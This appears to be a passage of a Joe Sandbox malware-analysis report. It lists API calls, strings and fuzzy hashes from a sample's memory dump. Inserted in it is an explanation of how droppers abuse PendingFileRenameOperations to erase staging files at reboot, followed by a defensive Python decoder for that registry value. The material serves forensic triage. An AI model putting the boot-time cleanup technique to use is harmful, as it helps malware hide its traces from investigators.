                                                                                                                            • 74D31540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D31500D31520D31540
                                                                                                                            • String ID: %E
                                                                                                                            • API String ID: 1003763464-175436132
                                                                                                                            • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                                            • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                                                                            • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                                            • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 0044B401
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ObjectReleaseSelect
                                                                                                                            • String ID: %H
                                                                                                                            • API String ID: 1831053106-1959103961
                                                                                                                            • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                                            • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                                                                            • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                                            • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                                                            • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                                                            • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DrawText$ByteCharMultiWide
                                                                                                                            • String ID: %H
                                                                                                                            • API String ID: 65125430-1959103961
                                                                                                                            • Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                                                            • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                                                                                            • Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                                                            • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

APIs
• SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
  • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
  • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
• GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 395431579-1506664499
• Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
• Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
• Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
• Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
Strings
• PendingFileRenameOperations2, xrefs: 00455A4F
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
• PendingFileRenameOperations, xrefs: 00455A40
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
• API String ID: 47109696-2115312317
• Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
• Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
• Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
• Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
Uniqueness
Uniqueness Score: -1.00%
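The function above (code at 00455A1C in process 15's dump) opens SYSTEM\CurrentControlSet\Control\Session Manager and references the PendingFileRenameOperations and PendingFileRenameOperations2 value names. On a compromised host these values are worth reading during triage: they hold the renames and deletions the session manager carries out at the next boot, which is how a dropper can replace a locked file or erase its own staging files without ever calling DeleteFile. The decoder below is an added example, not part of the Joe Sandbox report and not code recovered from the sample; the function names, the sample paths and the encoded value are all constructed for illustration. It handles the detail that trips up naive parsers: the value is REG_MULTI_SZ, a delete entry is an empty destination string (a lone NUL), so splitting the blob at the first double NUL truncates the list at the first delete.

```python
"""Decode a PendingFileRenameOperations REG_MULTI_SZ value into boot-time file operations.

Added example: not part of the Joe Sandbox report and not code recovered from the
sample. The session manager stores this value as REG_MULTI_SZ (UTF-16LE strings,
each NUL-terminated, the list closed by an extra NUL) holding source/destination
path pairs in NT form ('\\??\\C:\\...'). An empty destination means the source is
deleted at boot; a '!' prefix on the destination means replace-existing.
"""
from dataclasses import dataclass
from typing import List


@dataclass
class PendingOp:
    source: str
    destination: str        # "" -> source is deleted at next boot
    replace_existing: bool  # destination carried a leading '!'

    @property
    def kind(self) -> str:
        return "delete" if self.destination == "" else "rename"


def _strip_nt_prefix(path: str) -> str:
    # '\??\' is the NT object-namespace prefix the session manager uses for Win32 paths.
    return path[4:] if path.startswith("\\??\\") else path


def decode_multi_sz(blob: bytes) -> List[str]:
    """Split a REG_MULTI_SZ blob into strings, keeping interior empty strings.

    An empty destination is itself a lone NUL, so splitting at the first double
    NUL would truncate the list at the first delete entry. Instead the whole
    blob is decoded and only the trailing terminator empties are dropped.
    """
    parts = blob.decode("utf-16-le").split("\x00")
    while parts and parts[-1] == "":
        parts.pop()
    return parts


def parse_pending_ops(blob: bytes) -> List[PendingOp]:
    """Pair up entries and classify each as rename or delete."""
    parts = decode_multi_sz(blob)
    if len(parts) % 2:
        # A final delete entry loses its empty destination to the trailing-NUL
        # trim above; restore it so the pairing stays aligned.
        parts.append("")
    ops = []
    for src, dst in zip(parts[0::2], parts[1::2]):
        replace = dst.startswith("!")
        if replace:
            dst = dst[1:]
        ops.append(PendingOp(_strip_nt_prefix(src), _strip_nt_prefix(dst), replace))
    return ops


def deletions(blob: bytes) -> List[str]:
    """Paths scheduled for deletion: the list to check when a dropper cleans up after itself."""
    return [op.source for op in parse_pending_ops(blob) if op.kind == "delete"]


def encode_multi_sz(entries: List[str]) -> bytes:
    """Inverse of decode_multi_sz; used here only to build the constructed sample value."""
    return ("\x00".join(entries) + "\x00\x00").encode("utf-16-le")


# Constructed sample value (paths are made up): one delete, one replace-existing rename.
SAMPLE_BLOB = encode_multi_sz([
    "\\??\\C:\\Temp\\stage.tmp", "",
    "\\??\\C:\\Program Files (x86)\\App\\app.exe.new",
    "!\\??\\C:\\Program Files (x86)\\App\\app.exe",
])

if __name__ == "__main__":
    for op in parse_pending_ops(SAMPLE_BLOB):
        flag = " (replace existing)" if op.replace_existing else ""
        print(f"{op.kind:6} {op.source} -> {op.destination or '<delete>'}{flag}")
```

On a live Windows host the raw bytes come from `winreg.QueryValueEx` on that key (Python returns the value already split into a list, so only `parse_pending_ops`'s pairing logic is needed); from a forensic image, feed the decoder the raw value data of the SYSTEM hive. PendingFileRenameOperations2 has the same layout and is consumed the same way.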

APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
• FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
• FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
• FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
• Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
• Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
• Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
• FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
• FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
• FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
• Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
• Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
• Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetMenu.USER32(00000000), ref: 00421361
• SetMenu.USER32(00000000,00000000), ref: 0042137E
• SetMenu.USER32(00000000,00000000), ref: 004213B3
• SetMenu.USER32(00000000,00000000), ref: 004213CF
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Menu
• String ID:
• API String ID: 3711407533-0
• Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
• Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
• Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
• Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(?,?,?,?), ref: 00416B84
• SetTextColor.GDI32(?,00000000), ref: 00416B9E
• SetBkColor.GDI32(?,00000000), ref: 00416BB8
• CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Color$CallMessageProcSendTextWindow
• String ID:
• API String ID: 601730667-0
• Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
• Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
• Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
• Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                                                            • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4071923889-0
                                                                                                                            • Opcode ID: e6feda7d3358a80d2693463bb1cb51aaf78648cef31b4280cf5022ab190105ae
                                                                                                                            • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                                                                            • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                                                                             Uniqueness
                                                                                                                             • Uniqueness Score: -1.00%
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 0042311E
                                                                                                                            • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsDeviceEnumFontsRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2698912916-0
                                                                                                                            • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                                                            • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                                                                            • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                                                             Uniqueness
                                                                                                                             • Uniqueness Score: -1.00%
                                                                                                                            APIs
                                                                                                                            • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                                                            • GlobalUnWire.KERNEL32(00000000), ref: 00406276
                                                                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                                                            • GlobalFix.KERNEL32(00000000), ref: 00406281
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$AllocHandleWire
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2210401237-0
                                                                                                                            • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                                            • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                                                            • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                                                             Uniqueness
                                                                                                                             • Uniqueness Score: -1.00%
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                                            • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                                                            Strings
                                                                                                                            • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                                                            • NumRecs range exceeded, xrefs: 0045C396
                                                                                                                            Similarity
                                                                                                                            • API ID: File$BuffersFlush
                                                                                                                            • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                                            • API String ID: 3593489403-659731555
                                                                                                                            • Opcode ID: 801dcd038e335b265826125cf8ff6a7c252aa7dfa969982b1ed0869fe0f6d4ae
                                                                                                                            • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                                                            • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                                                             Uniqueness
                                                                                                                             • Uniqueness Score: -1.00%
                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                                            • String ID: he
                                                                                                                            • API String ID: 296031713-1137534704
                                                                                                                            • Opcode ID: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                                                            • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                                                                            • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                                                                             Uniqueness
                                                                                                                             • Uniqueness Score: -1.00%
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                                                              • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                                                              • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                                              • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                                                              • Part of subcall function 004063C4: 6F561CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                                                              • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                                                              • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                                                              • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                                              • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                                                              • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                                                              • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                                                              • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                                                              • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                                                              • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                                                              • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                                              • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                                              • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                                                              • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                                              • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                                                              • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                                                              • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
